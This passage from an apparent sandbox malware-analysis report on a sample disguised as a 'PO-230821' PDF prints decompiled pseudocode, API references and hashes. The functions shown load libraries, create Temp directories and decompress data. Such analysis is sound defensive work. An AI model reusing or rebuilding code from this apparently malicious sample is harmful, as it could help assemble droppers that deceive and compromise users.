						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402103
LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
GetModuleHandleExW.KERNEL32(?,00000400,?,0040CE58,0040A000,?,00000008,00000001,000000F0), ref: 00402164

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend$HandleLibraryModulelstrlen$FreeLoadTextWindowlstrcat
String ID:
API String ID: 2042231997-0
Opcode ID: c0fc562415b006524e612b10bc8b4f19115c3b5e74acc175c6571b6fb39ea03e
Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
Opcode Fuzzy Hash: c0fc562415b006524e612b10bc8b4f19115c3b5e74acc175c6571b6fb39ea03e
Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1909526481
Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
